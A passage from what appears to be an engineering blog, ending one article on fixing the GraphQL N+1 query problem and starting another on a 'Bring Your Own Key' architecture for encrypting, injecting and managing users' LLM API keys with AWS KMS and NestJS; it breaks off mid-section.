  // One query for every user ID collected in this tick (PostgreSQL array syntax)
  const posts = await db.query("SELECT * FROM posts WHERE user_id = ANY($1)", [userIds]);
  // DataLoader expects one result per key, in the same order as the keys
  return userIds.map((id) => posts.filter((p) => p.user_id === id));
});

// Resolver
const resolvers = {
  User: {
    posts: (user) => postLoader.load(user.id),
  },
};</code></pre><p>GraphQL calls <code>postLoader.load()</code> once per user; DataLoader <strong>batches</strong> those calls into just <strong>1 query</strong>.</p><h3 id="dataloader-c-n-c-request-level-cache">DataLoader also has a request-level cache</h3><pre><code class="language-js">// In the same request, user_id = 1 is loaded twice
postLoader.load(1); // queued into the batch query
postLoader.load(1); // cache hit: returns the same promise, no extra query
</code></pre><hr><h3 id="nh-ng-dataloader-c-ng-kh-ng-ph-i-ho-n-to-n-x-l-tri-t-n-1-query">But DataLoader does not fully solve N+1 either</h3><p>If the query depth is too large:</p><pre><code class="language-graphql"># users → posts → comments → authors → followers → ...
query {
  organizations {
    users {
      posts {
        comments {
          author {
            organizations {
              users {
                posts {
                  id
                }
              }
            }
          }
        }
      }
    }
  }
}</code></pre><p>the workload is still enormous. DataLoader reduces N+1, but it cannot fix <strong>bad query design</strong>.</p><p>DataLoader can turn:</p><pre><code class="language-sql">SELECT * FROM users WHERE organization_id = ?
</code></pre><p>into</p><pre><code class="language-sql">SELECT * FROM users WHERE organization_id IN (...)
</code></pre><p>but if the query asks for:</p><ul><li>100 organizations</li><li>100 users per organization</li><li>100 posts per user</li><li>100 comments per post</li></ul><p>then the result is still 100 × 100 × 100 × 100 = 100 million records.</p><h3 id="m-t-v-n-kh-c-overfetching-b-ng-join">Another problem: overfetching with JOINs</h3><p>Some teams fight N+1 by JOINing everything:</p><pre><code class="language-sql">SELECT u.*, p.*, c.*
FROM users u
LEFT JOIN posts p ON p.user_id = u.id
LEFT JOIN comments c ON c.post_id = p.id
</code></pre><ul><li>The number of queries drops from many to one, but in exchange data is duplicated, the payload is larger than necessary, RAM usage goes up and serialization gets slower.</li><li>For example, a user with 100 posts, each with 50 comments, produces 5,000 result rows just to represent that one user.</li></ul><p><strong>N+1 queries</strong> and <strong>too many JOINs</strong> are both imperfect answers. The backend engineer's job is to find the right balance between the number of queries, the amount of data returned and the system's processing cost for each use case.</p><hr><h2 id="c-c-k-thu-t-th-ng-d-ng-gi-p-kh-c-ph-c-i-u-n-y">Common techniques to mitigate this</h2><h3 id="2-1-query-complexity-analysis">2.1 Query complexity analysis</h3><p>Compute the complexity of a query before executing it.</p><pre><code class="language-graphql">query {
  organizations {  # 10 records
    users {        # ×10
      posts {      # ×10
        comments { # ×10
          author {
            name
          }
        }
      }
    }
  }
}

# complexity = 10 × 10 × 10 × 10 = 10,000</code></pre><p>If it exceeds the threshold:</p><!--kg-card-begin: markdown--><pre><code class="language-js">if (complexity > 5000) {
  throw new Error("Query too complex");
}</code></pre>
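<p>The multiplication above can be automated. A minimal sketch, assuming the query has already been turned into a plain nested object (real implementations walk the parsed GraphQL AST) and that every list field returns about <code>listSize</code> items. <code>estimateComplexity</code>, <code>assertAcceptable</code> and the fixed size of 10 are illustrative assumptions, not any particular library's API.</p>
<pre><code class="language-js">// Multiplicative cost model: a list field multiplies the cost of everything below it.
// `selection` is a nested object; a leaf field is written as null.
function estimateComplexity(selection, listFields, listSize = 10) {
  let total = 0;
  for (const [field, child] of Object.entries(selection)) {
    const multiplier = listFields.has(field) ? listSize : 1;
    const childCost = child ? estimateComplexity(child, listFields, listSize) : 1;
    total += multiplier * childCost; // siblings add up, nested lists multiply
  }
  return total;
}

// Reject the query before any resolver runs.
function assertAcceptable(selection, listFields, maxComplexity = 5000) {
  const complexity = estimateComplexity(selection, listFields);
  if (complexity > maxComplexity) throw new Error(`Query too complex: ${complexity}`);
  return complexity;
}

const listFields = new Set(["organizations", "users", "posts", "comments"]);
const query = { organizations: { users: { posts: { comments: { author: { name: null } } } } } };
console.log(estimateComplexity(query, listFields)); // 10000
</code></pre>
<p>Because nested lists multiply, a single extra level of nesting can push an innocent-looking query past the limit, which is exactly the case this check is meant to stop.</p>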
<!--kg-card-end: markdown--><h3 id="2-2-batch-loading">2.2 Batch loading</h3><pre><code class="language-js">// Instead of (one round trip per ID):
for (const id of ids) await fetchUser(id);

// Use:
await fetchUsers(ids); // 1 query
</code></pre><h3 id="2-3-preloading">2.3 Preloading</h3><p>Some relations should be preloaded before the resolvers run:</p><pre><code class="language-js">const users = await User.findAll({ include: [{ model: Post }] }); // Sequelize eager loading
</code></pre><h3 id="2-4-depth-limiting">2.4 Depth limiting</h3><p>Limit the depth of GraphQL queries to prevent query explosion:</p><pre><code class="language-graphql"># Max depth = 5

query {
  user {
    posts {
      comments {
        user {
          id
        }
      }
    }
  }
}
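</code></pre><pre><code class="language-js">import { ApolloServer } from '@apollo/server';
import depthLimit from 'graphql-depth-limit';

const server = new ApolloServer({
  typeDefs,   // your schema
  resolvers,  // your resolvers
  validationRules: [depthLimit(5)], // reject operations nested deeper than 5 levels
});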
</code></pre><p>With a maximum depth of 5, deeper queries are rejected with an error along these lines (the exact message depends on the library):</p><pre><code class="language-json">{"errors": [{"message": "Query exceeds maximum depth"}]}

</code></pre><h3 id="2-5-query-specific-resolver">2.5 Query-specific resolvers</h3><p>For dashboards (or similar business screens), avoid using <code>graph traversal</code> just to get counts or statistics, because it fetches a lot of unnecessary data.</p><p><strong>Don't</strong></p><pre><code class="language-graphql">query {
  dashboard {
    users {
      id
    }
  }
}</code></pre><p>and then have the frontend count:</p><pre><code class="language-js">data.dashboard.users.length</code></pre><p><strong>Instead, create a dedicated resolver</strong> that queries the needed aggregate values directly.</p><pre><code class="language-graphql">query {
  dashboard {
    totalUsers
    totalPosts
    latestComments
  }
}</code></pre><p>=> This reduces the payload, avoids N+1 and is tailored to the dashboard.</p><h3 id="2-6-persisted-queries">2.6 Persisted queries</h3><p>Do not let the client send arbitrary queries; only allow queries that have been registered on the server in advance.</p><pre><code class="language-http">POST /graphql
{"queryId": "dashboard_v2"}
</code></pre><p>On the server:</p><pre><code class="language-text">dashboard_v2
=> query has already been reviewed
=> complexity is known in advance</code></pre><h3 id="2-7-cache">2.7 Cache</h3><p>DataLoader only caches within a single request.</p><p>It is usually combined with:</p><ul><li>Redis</li><li>CDN</li><li>Response cache</li><li>Apollo Cache</li></ul><h3 id="th-c-t-s-gi-i-quy-t-nh-sau">In practice, the fix looks like this</h3><p>GraphQL<br>├─ DataLoader<br>├─ Depth Limit<br>├─ Complexity Limit<br>├─ Pagination<br>├─ Redis Cache<br>├─ Custom Dashboard Queries<br>└─ Persisted Queries</p><hr><h2 id="3-index-v-partition-c-gi-i-quy-t-c-n-1-kh-ng">3. Do indexes and partitioning solve N+1?</h2><p>This ties back to an <a href="https://blog.vietnamlab.vn/toi-uu-toc-do-query-trong-co-so-du-lieu-voi-indexing-partitioning/">earlier article</a> on indexing and partitioning. If I index and partition correctly, surely that takes care of N+1 queries too?</p><p>The truth is that they can help, but they do not fix the root cause of N+1.</p><p>When queries are slow, many teams:</p><ul><li>Add indexes</li><li>Partition tables</li><li>Increase the RDS instance size</li><li>Add Redis</li><li>Scale out pods</li></ul><p>while the real problem is <strong>too many queries</strong>, not how slow each individual query is.</p><h3 id="index-c-gi-p-kh-ng">Do indexes help?</h3><p><strong>They can help, but they do not fix the root cause of N+1.</strong></p><ul><li><code>1 query = 2ms</code> → very fast</li><li><code>1000 queries = 2000ms</code><br>→ before counting network overhead, connections, serialization, lock waits and context switching</li></ul><p>=> An index does not reduce round trips. Every query still has to go through:</p><p><code>acquire connection → send SQL → DB parses → executes → returns data → deserialize → release connection</code></p><p>and N+1 makes this cycle repeat hundreds of times.</p><p>This is what many people overlook. And does <strong>partitioning</strong> help? Yes, but at a different layer.</p><h3 id="partition-c-gi-p-kh-ng">Does partitioning help?</h3><p>Partitioning reduces <code>scan size</code> and improves performance on large tables, but it does not reduce the number of round trips.</p><blockquote><strong>It's like this:</strong> you are shipping goods to 1,000 customers at the same destination.<br>- Without N+1 → 1 truck trip: a single run delivers all the goods.<br>- With N+1 → 1,000 motorbike trips.</blockquote><p>=> <strong>Indexes and partitions</strong> clear the road and spread traffic across more routes, but you are <code><strong>still making 1,000 trips</strong></code>.</p><h3 id="sai-l-m-ph-bi-n-c-a-team-backend">A common mistake by backend teams</h3><p>When things get slow, teams reach for many sophisticated fixes that cost a lot of time and infrastructure money, when all that is needed is to follow the right order.</p><p><strong>The right order of fixes:</strong></p><pre><code>Fix N+1
→ Reduce query count
→ Batch loading
→ Optimize fetch strategy
→ Only then tune the DB
</code></pre><hr><h2 id="rule-quan-tr-ng-nh-t-khi-vi-t-graphql-resolver">The most important rule when writing GraphQL resolvers</h2><p>❌ Don't ask: <em>"Is this query correct?"</em></p><p>✅ Ask: <strong>"How many SQL queries will this generate with 1,000 records?"</strong></p><hr><h2 id="k-t-lu-n">Conclusion</h2><p><code><strong>The N+1 Query Problem</strong></code> is not just a performance issue. It reflects:</p><ul><li>how well developers <strong>understand the database</strong></li><li>how the team <strong>designs the architecture</strong></li><li>the level of <strong>observability</strong> in the system</li></ul><p>The scariest thing about N+1 is that <strong>the code still works correctly</strong>, right up until the day production traffic grows.</p><p>And at that point, adding CPU, pods or cache <strong>will not save you</strong>, because the root cause lies in <strong>how the data is fetched</strong>.</p><p>References:</p><ul><li><a href="https://graphql.org/">https://graphql.org</a></li><li><a href="https://docs.sentry.io/product/issues/issue-details/performance-issues/n-one-queries/">https://docs.sentry.io/product/issues/issue-details/performance-issues/n-one-queries</a></li></ul>
</article>
<article>
<h1>Bring Your Own Key (BYOK): System architecture for integrating users' own LLM API keys</h1>
<p>B.D.N — Sat, 27 Jun 2026 08:39:57 GMT</p>
<h2 id="m-u-v-sao-byok-ang-tr-th-nh-ti-u-chu-n-ng-m">Introduction: why BYOK is becoming an unwritten standard</h2><p>If you are building a product with LLM integration (a chatbot, an agent, a tool that calls OpenAI/Anthropic), sooner or later an enterprise customer will ask: <em>"Can I use my own API key?"</em></p><p>They are not asking to save a few dollars. The real reasons are:</p><ul><li><strong>Compliance & data residency</strong>: some organizations are bound by contracts or regulations that forbid routing AI traffic through a third party's billing account.</li><li><strong>Dedicated rate limits & quota</strong>: they already hold a high tier with OpenAI/Anthropic and do not want to be capped by the shared quota of the SaaS you operate.</li><li><strong>Cost control</strong>: enterprises want to see AI spend directly on their own billing dashboard, without your markup.</li><li><strong>Reducing vendor lock-in risk</strong>: if they switch providers, they do not depend on whether you support the new one in time.</li></ul><p>BYOK (Bring Your Own Key) solves exactly that problem. Instead of your system calling the LLM with one central key for every user, each tenant/user supplies their own API key (OpenAI, Anthropic, Azure OpenAI, etc.), and your system acts only as the orchestration layer: it handles routing and business logic, but it does <strong>not own</strong> the credit card or carry the billing for that AI traffic.</p><p>It sounds simple, but doing it right hides quite a few traps: how to store keys so they never leak into production logs, how to inject keys at runtime without adding latency, how to handle multi-tenancy when one user may hold several keys for several providers, and how to rotate/revoke keys when you have no direct access to the provider account.</p><p>This article walks through the full architecture of a BYOK system for LLMs, with examples in NestJS/Node.js on AWS, a common stack for this kind of system; the architectural principles apply to any language or platform.</p><h2 id="1-m-h-nh-t-ng-quan-byok-ng-u-trong-request-lifecycle">1. Overview: where BYOK sits in the request lifecycle</h2><p>Before going into details, picture a typical request lifecycle:</p><pre><code>Client → API Gateway/ALB → NestJS App
                                │
                                ├─ 1. Identify the tenant/user
                                ├─ 2. Resolve the API key (BYOK or system fallback key)
                                ├─ 3. Decrypt the key (KMS/Vault)
                                ├─ 4. Inject the key into the LLM client (at runtime, no long-lived plaintext cache)
                                ├─ 5. Call the LLM provider (OpenAI/Anthropic/...)
                                ├─ 6. Stream/aggregate the response
                                └─ 7. Log usage (never the key) + billing reconciliation
</code></pre><p>The three core architectural blocks this article focuses on are:</p><ol><li><strong>Key Storage Layer</strong>: secure storage, encryption, versioning.</li><li><strong>Runtime Injection Layer</strong>: the request flow when the API is actually called.</li><li><strong>Multi-tenancy & Key Management Layer</strong>: managing many keys and many providers per tenant.</li></ol><h2 id="2-b-o-m-t-l-u-tr-key-storage-layer-">2. Securing key storage (Storage Layer)</h2><h3 id="2-1-nguy-n-t-c-b-t-bi-n-kh-ng-bao-gi-l-u-plaintext">2.1. The non-negotiable rule: never store plaintext</h3><p>An OpenAI/Anthropic API key is essentially a "bearer credential": whoever holds it can spend on the user's account. So the first rule admits no compromise: <strong>never store keys as plaintext in the database</strong>, whether Postgres, DynamoDB, or Redis.</p><p>There are three common options, in increasing order of complexity:</p><h4 id="option-a-envelope-encryption-v-i-aws-kms">Option A: Envelope encryption with AWS KMS</h4><p>This is the best fit for most systems running on AWS, because it builds on the IAM infrastructure you already have.</p><p>How it works:</p><ul><li>Create a <strong>KMS key</strong> (formerly called a <strong>Customer Master Key, CMK</strong>), for example <code>alias/byok-master-key</code>.</li><li>When a user enters an API key, the system calls <code>kms:GenerateDataKey</code> to get a <strong>Data Encryption Key (DEK)</strong>; KMS returns both the plaintext DEK and the ciphertext DEK.</li><li>Use the plaintext DEK to encrypt the API key with AES-256-GCM, then <strong>wipe the plaintext DEK from memory immediately</strong>.</li><li>Store in the DB: <code>encrypted_key</code> (ciphertext of the API key) + <code>encrypted_dek</code> (ciphertext of the DEK) + <code>iv</code>/<code>auth_tag</code>.</li><li>At use time: call <code>kms:Decrypt</code> on <code>encrypted_dek</code> to recover the plaintext DEK, use it to decrypt the API key, then wipe the DEK from memory once done.</li></ul><p>This is called <strong>envelope encryption</strong>: you do not ask KMS to decrypt the API key directly (that costs money per call, and KMS caps direct encryption at 4 KB of data); KMS only protects the DEK, and the DEK protects the actual data.</p><p>Example in NestJS (abridged, without full error handling):</p><pre><code class="language-typescript">// kms-encryption.service.ts
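import { Injectable } from '@nestjs/common';
import { KMSClient, GenerateDataKeyCommand, DecryptCommand } from '@aws-sdk/client-kms';
import * as crypto from 'crypto';

// Shape of one stored credential (every field base64-encoded)
export interface EncryptedPayload {
  encryptedKey: string;
  encryptedDek: string;
  iv: string;
  authTag: string;
}

@Injectable()
export class KmsEncryptionService {
  private readonly kms = new KMSClient({ region: process.env.AWS_REGION });
  // Must be set, e.g. "alias/byok-master-key"
  private readonly keyId = process.env.KMS_KEY_ID as string;

  async encryptApiKey(plaintextKey: string): Promise<EncryptedPayload> {
    // Ask KMS for a fresh 256-bit DEK, returned both in plaintext and encrypted under the KMS key
    const { Plaintext, CiphertextBlob } = await this.kms.send(
      new GenerateDataKeyCommand({ KeyId: this.keyId, KeySpec: 'AES_256' }),
    );
    if (!Plaintext || !CiphertextBlob) {
      throw new Error('KMS did not return a data key');
    }

    try {
      const iv = crypto.randomBytes(12); // 96-bit IV, the recommended size for GCM
      const cipher = crypto.createCipheriv('aes-256-gcm', Plaintext, iv);
      const encrypted = Buffer.concat([
        cipher.update(plaintextKey, 'utf8'),
        cipher.final(),
      ]);

      return {
        encryptedKey: encrypted.toString('base64'),
        encryptedDek: Buffer.from(CiphertextBlob).toString('base64'),
        iv: iv.toString('base64'),
        authTag: cipher.getAuthTag().toString('base64'),
      };
    } finally {
      // Wipe the plaintext DEK from memory, even if encryption throws
      Plaintext.fill(0);
    }
  }

  async decryptApiKey(payload: EncryptedPayload): Promise<string> {
    // Only the encrypted DEK goes to KMS; the API key itself is decrypted locally
    const { Plaintext: dek } = await this.kms.send(
      new DecryptCommand({
        CiphertextBlob: Buffer.from(payload.encryptedDek, 'base64'),
      }),
    );
    if (!dek) {
      throw new Error('KMS did not return a plaintext data key');
    }

    try {
      const decipher = crypto.createDecipheriv(
        'aes-256-gcm',
        dek,
        Buffer.from(payload.iv, 'base64'),
      );
      // With a wrong auth tag, final() throws: tampered ciphertext is rejected
      decipher.setAuthTag(Buffer.from(payload.authTag, 'base64'));

      const decrypted = Buffer.concat([
        decipher.update(Buffer.from(payload.encryptedKey, 'base64')),
        decipher.final(),
      ]);
      return decrypted.toString('utf8');
    } finally {
      dek.fill(0); // wipe the DEK from memory after use, even if decryption fails
    }
  }
}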
</code></pre><p><strong>Important</strong>: set the policy on the KMS key so that only a specific service role (for example, the ECS Task Role of the service handling LLM requests) has <code>kms:Decrypt</code>. Keep the Task Execution Role (pulling images, writing logs) clearly separate from the Task Role (business permissions): the service that writes keys (write path) should have <code>GenerateDataKey</code>, while the service that reads keys at runtime needs only <code>Decrypt</code>, not <code>GenerateDataKey</code>. This least-privilege split significantly shrinks the blast radius if one service is compromised.</p><h4 id="option-b-d-ng-aws-secrets-manager-parameter-store">Option B: AWS Secrets Manager / Parameter Store</h4><p>A good fit when the number of keys is modest (a few hundred to a few thousand), because Secrets Manager charges per secret per month. It simplifies rotation thanks to Secrets Manager's built-in rotation mechanism, but it does not scale well for a SaaS model where tens of thousands of tenants add their own keys; at that point, self-managed envelope encryption in the DB is cheaper and more flexible.</p><h4 id="option-c-hashicorp-vault-external-secret-store">Option C: HashiCorp Vault / external secret store</h4><p>Worth considering when your system is already multi-cloud or needs a secret store independent of AWS. It is harder to operate (you must run your own Vault cluster or use HCP Vault), but it offers stronger audit trails and dynamic secrets.</p><p><strong>Recommendation for a NestJS system on ECS</strong>: Option A (KMS + envelope encryption) strikes the best balance between cost, operational complexity, and native IAM integration on AWS.</p><h3 id="2-2-schema-l-u-tr-">2.2. Storage schema</h3><p>A minimal schema for the key table, following a multi-tenant, multi-provider model:</p><pre><code class="language-sql">CREATE TABLE byok_credentials (
  id UUID PRIMARY KEY DEFAULT gen_random_uuid(),
  tenant_id UUID NOT NULL REFERENCES tenants(id),
  provider VARCHAR(50) NOT NULL,        -- 'openai' | 'anthropic' | 'azure_openai'
  alias VARCHAR(100),                    -- user-chosen display name
  encrypted_key TEXT NOT NULL,
  encrypted_dek TEXT NOT NULL,
  iv VARCHAR(50) NOT NULL,
  auth_tag VARCHAR(50) NOT NULL,
  key_fingerprint VARCHAR(64) NOT NULL,  -- hash for spotting duplicate keys, NOT used for decryption
  status VARCHAR(20) NOT NULL DEFAULT 'active', -- active | revoked | invalid
  last_validated_at TIMESTAMPTZ,
  last_used_at TIMESTAMPTZ,
  created_at TIMESTAMPTZ NOT NULL DEFAULT now(),
  updated_at TIMESTAMPTZ NOT NULL DEFAULT now(),
  UNIQUE (tenant_id, provider, alias)
);

CREATE INDEX idx_byok_tenant_provider ON byok_credentials(tenant_id, provider, status);
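
-- Sketch, assuming PostgreSQL with $1 = tenant_id and $2 = provider:
-- the per-request lookup that idx_byok_tenant_provider is meant to serve.
-- It prefers the tenant's alias = 'default' key, then the most recently validated one.
SELECT id, encrypted_key, encrypted_dek, iv, auth_tag
FROM byok_credentials
WHERE tenant_id = $1
  AND provider = $2
  AND status = 'active'
ORDER BY COALESCE(alias = 'default', false) DESC,
         last_validated_at DESC NULLS LAST
LIMIT 1;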
</code></pre><p>A few points worth noting:</p><ul><li><strong><code>key_fingerprint</code></strong>: a one-way hash (for example, SHA-256 of the original key plus a fixed salt) that lets the system answer "has this key been added before?" without decrypting anything. It stops users from adding the same key twice by accident, and it can reveal the same key being used by several tenants (a sign of a leak).</li><li><strong><code>status</code></strong>: do not hard-delete a key when the user revokes it; soft-delete it to keep the audit trail and to avoid orphaned references from old request logs.</li><li><strong><code>last_validated_at</code></strong>: the last time the system made a lightweight request (for example <code>GET /v1/models</code>) to confirm the key is still valid. This matters for catching keys revoked on the provider side before the user hits an error in the middle of a workflow.</li></ul><h2 id="3-lu-ng-request-runtime-proxy-key-injection">3. Runtime request flow: proxy & key injection</h2><p>This is the part whose complexity many people underestimate. The problem is not just "decrypt the key, then call the API", but how to <strong>keep the key in memory no longer than necessary, keep it out of logs, avoid adding noticeable latency, and still support streaming</strong>.</p><h3 id="3-1-v-tr-t-byok-resolver-trong-nestjs">3.1. Where to put the BYOK resolver in NestJS</h3><p>A sensible structure is a dedicated <code>ByokInterceptor</code> (or middleware) that runs before the request reaches the LLM client, rather than scattering decryption logic across individual services.</p><pre><code class="language-typescript">// byok.interceptor.ts
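import {
  CallHandler,
  ExecutionContext,
  Injectable,
  NestInterceptor,
} from '@nestjs/common';
import { finalize } from 'rxjs/operators';
// The two services below belong to this article; the file paths are assumptions
import { CredentialService } from './credential.service';
import { KmsEncryptionService } from './kms-encryption.service';

@Injectable()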
export class ByokInterceptor implements NestInterceptor {
  constructor(
    private readonly credentialService: CredentialService,
    private readonly kms: KmsEncryptionService,
  ) {}

  async intercept(context: ExecutionContext, next: CallHandler) {
    const req = context.switchToHttp().getRequest();
    const tenantId = req.tenantId; // set earlier by the AuthGuard
    const provider = req.body.provider ?? 'openai';

    const credential = await this.credentialService.resolve(tenantId, provider);

    if (!credential) {
      // Fallback: use the system key (if the product supports both billing models)
      req.llmApiKey = this.credentialService.getSystemFallbackKey(provider);
      req.billingMode = 'platform';
    } else {
      req.llmApiKey = await this.kms.decryptApiKey(credential.payload);
      req.billingMode = 'byok';
    }

    return next.handle().pipe(
      finalize(() => {
        // Drop the reference from the request object once the response has been sent
        req.llmApiKey = null;
      }),
    );
  }
}
</code></pre><p>The key point: <code>req.llmApiKey</code> exists only for the lifetime of one request and is never cached at any other layer (not in Redis, not in logs, not attached to a context passed on to a queue).</p><h3 id="3-2-tuy-t-i-kh-ng-log-key-k-c-v-t-nh">3.2. Never log the key, not even by accident</h3><p>This is the most common mistake in practice: a typical NestJS logging interceptor records the whole <code>request.body</code> or <code>request.headers</code> for debugging, and if the key travels in a header (<code>Authorization: Bearer sk-...</code>) or in the payload, it silently ends up in CloudWatch Logs.</p><p>The fix: a centralized redaction layer that does not rely on developers remembering to mask fields.</p><pre><code class="language-typescript">// One pattern for OpenAI (sk-..., sk-proj-...) and Anthropic (sk-ant-...) keys; newer formats contain '-' and '_'.
// \b keeps it from firing inside ordinary words such as "task-...".
const SENSITIVE_PATTERNS = [/\bsk-[A-Za-z0-9_-]{20,}/g];

function redactSensitive(input: string): string {
  return SENSITIVE_PATTERNS.reduce(
    (acc, pattern) => acc.replace(pattern, '[REDACTED_KEY]'),
    input,
  );
}
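
// Usage sketch with made-up sample strings (not real keys): a key embedded in an
// upstream error message or a header dump is masked before the line reaches the logger.
console.log(redactSensitive('upstream returned 401 for key sk-AbCdEfGhIjKlMnOpQrStUv123456'));
// → upstream returned 401 for key [REDACTED_KEY]
console.log(redactSensitive('x-api-key: sk-ant-api03-AbCdEfGhIjKlMnOpQrSt'));
// → x-api-key: [REDACTED_KEY]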
</code></pre><p>Apply this pattern at the global logger level (for example, a custom Winston format), not only where you think a key "might" appear, because exception stack traces, error responses from the provider, and even APM tracing payloads (Datadog, New Relic) can carry the key along.</p><h3 id="3-3-streaming-v-v-n-gi-key-s-ng-trong-su-t-response">3.3. Streaming and keeping the key "alive" for the whole response</h3><p>For a non-streaming request, the key only needs to exist for the instant of the API call. With streaming (SSE from OpenAI/Anthropic), however, the connection may last tens of seconds, and if the system persists chunks (for example in Redis Streams) to support reconnect/replay, be especially careful: <strong>intermediate stored chunks must contain response content, never the API key</strong>. Do not let any part of the original request (including the key) be serialized into the stored payload.</p><p>A safe pattern: decrypt the key right before opening the connection to the provider, keep it in the narrowest possible local scope (not attached to a larger object passed through several layers), and let it go out of scope (for the GC to reclaim) as soon as the HTTP client has put it into the request header.</p><pre><code class="language-typescript">async function streamFromProvider(tenantId: string, provider: string, payload: any) {
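  // resolveAndDecryptKey and getProviderEndpoint are assumed helpers (not shown)
  const apiKey = await resolveAndDecryptKey(tenantId, provider); // narrow scope

  // Each provider expects the key in a different header
  const authHeaders: Record<string, string> =
    provider === 'anthropic'
      ? { 'x-api-key': apiKey, 'anthropic-version': '2023-06-01' }
      : provider === 'azure_openai'
        ? { 'api-key': apiKey }
        : { Authorization: `Bearer ${apiKey}` };

  const upstream = await fetch(getProviderEndpoint(provider), {
    method: 'POST',
    headers: { ...authHeaders, 'Content-Type': 'application/json' },
    body: JSON.stringify(payload),
  });
  // apiKey and authHeaders are not referenced anywhere after this line

  if (!upstream.ok || !upstream.body) {
    // Hand the status (401/429/5xx) to the error mapping of section 3.4; never echo the headers
    throw new Error(`Provider ${provider} responded with HTTP ${upstream.status}`);
  }
  return upstream.body; // pipe into the SSE response, or publish chunks to a Redis Stream
}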
</code></pre><h3 id="3-4-retry-error-mapping-kh-c-bi-t-quan-tr-ng-so-v-i-platform-key">3.4. Retry & error mapping: a key difference from a platform key</h3><p>With a system key, a <code>429</code> or <code>401</code> is an internal problem you handle yourself (switch to a backup key, alert the ops team). With BYOK, that error is <strong>the user's problem</strong>: they need to know exactly whether their key has expired or run out of quota, or whether your system has a bug. The error-handling flow must therefore classify errors clearly:</p><!--kg-card-begin: html--><table>
<thead>
<tr>
<th>Provider error code</th>
<th>Likely cause</th>
<th>System action</th>
</tr>
</thead>
<tbody>
<tr>
<td>401</td>
<td>Wrong or revoked key</td>
<td>Mark <code>status = invalid</code>, notify the user via UI/email</td>
</tr>
<tr>
<td>429</td>
<td>Rate limit exceeded on the <em>user's own account</em></td>
<td>Return a clear error such as "rate limit reached on your OpenAI account", not a system error</td>
</tr>
<tr>
<td>500/503 from the provider</td>
<td>Transient provider-side error</td>
<td>Retry with backoff; do not mark the key invalid</td>
</tr>
<tr>
<td>Timeout</td>
<td>Network issue or slow provider</td>
<td>Bounded retries; log separately to tell it apart from key errors</td>
</tr>
</tbody>
</table><!--kg-card-end: html--><p>Mixing up these error types is a common source of misleading support tickets: the user thinks your product is broken, when in fact their OpenAI account quota has run out.</p><h2 id="4-multi-tenancy-qu-n-l-nhi-u-key-provider">4. Multi-tenancy & managing multiple keys/providers</h2><h3 id="4-1-m-h-nh-d-li-u-cho-multi-provider">4.1. Data model for multiple providers</h3><p>A real tenant rarely uses just one provider. They may use GPT-4 for one feature and Claude for another (for example, for its longer context window), or use Azure OpenAI for regional compliance reasons. The system needs a <strong>per-provider, per-model routing</strong> layer that is separate from the key storage layer.</p><pre><code class="language-typescript">interface ModelRoute {
  tenantId: string;
  feature: string;        // 'chat' | 'summarize' | 'agent-loop'
  provider: 'openai' | 'anthropic' | 'azure_openai';
  model: string;
  credentialId: string;   // FK to byok_credentials
  fallbackToPlatform: boolean; // whether falling back to the system key is allowed if BYOK fails
}
</code></pre><p>Separating <code>ModelRoute</code> from <code>Credential</code> lets a tenant change models without changing keys, and change keys without touching routing logic: two lifecycles that change at different speeds.</p><h3 id="4-2-resolve-order-chi-n-l-c-ch-n-key-khi-c-nhi-u-l-a-ch-n">4.2. Resolve order: choosing a key when there are several candidates</h3><p>When a request arrives, <code>CredentialService.resolve()</code> needs a clear priority order, for example:</p><ol><li>A key assigned specifically to that feature/model (if the tenant configured one).</li><li>The tenant's default key (<code>alias = 'default'</code>) for that provider.</li><li>If no BYOK key is active and <code>fallbackToPlatform = true</code>, use the system key and tag the request with <code>billingMode = 'platform'</code> so billing charges correctly.</li><li>If nothing is available, return a clear error to the client; never fail silently.</li></ol><p>This logic deserves thorough unit tests, because mistakes here have serious consequences: using the system key for traffic that should have been billed to the customer's BYOK account (a cost risk), or, conversely, rejecting valid requests.</p><h3 id="4-3-c-ch-ly-theo-tenant-t-ng-h-t-ng-kh-ng-ch-t-ng-logic-">4.3. Tenant isolation at the infrastructure level (not just in application logic)</h3><p>If your product serves both the Vietnamese and Japanese markets with different compliance requirements, checking the tenant ID in application logic alone is not enough for strict audits.
Some additional strategies:</p><ul><li><strong>Separate KMS keys per region/tenant tier</strong>: large enterprise tenants may require a dedicated CMK (<code>alias/byok-tenant-{id}</code>) instead of a shared one; this raises KMS cost but satisfies contractual "key isolation" requirements.</li><li><strong>VPC endpoint for KMS</strong>: if ECS tasks call KMS, use a VPC endpoint (interface endpoint) instead of going out through a NAT Gateway to the internet; this cuts NAT cost and shrinks the attack surface, because the traffic stays on the AWS network.</li><li><strong>A dedicated audit log for credential access</strong>: every <code>decrypt</code> should be recorded in a separate audit trail (who/when/which tenant), kept apart from ordinary application logs, with longer retention (for later investigations) and stricter access control.</li></ul><h3 id="4-4-rotation-v-revocation">4.4. Rotation and revocation</h3><p>BYOK brings an uncomfortable reality: <strong>you do not control the key's lifecycle</strong>; that belongs to the user and the provider.
The system needs a mechanism that proactively detects dead keys instead of waiting for users to report errors:</p><ul><li><strong>Background validation job</strong>: a scheduled job (CloudWatch Events, now Amazon EventBridge, triggering a Lambda, or a BullMQ job in NestJS) periodically calls a lightweight endpoint (<code>/v1/models</code> or equivalent) for keys that have not been validated recently, then updates <code>last_validated_at</code> and <code>status</code>.</li><li><strong>Webhook/notification when a key turns invalid</strong>: when a key fails during a real workflow (not through the validation job), trigger a notification right away (email, in-app); do not let users find out only because a feature stopped working.</li><li><strong>Grace period before hard deletion</strong>: when a user revokes a key in the UI, keep it at <code>status = revoked</code> for a while (for example, 30 days) before deleting the record, in case they need the usage history for billing reconciliation.</li></ul><h2 id="5-m-t-v-i-c-n-nh-c-v-n-h-nh-th-c-t-">5. Some practical operational considerations</h2><p><strong>KMS cost at scale</strong>: <code>GenerateDataKey</code> and <code>Decrypt</code> are both billed per request (beyond the free tier). At millions of requests per day, decrypting the key separately for every request can add up to a significant cost.
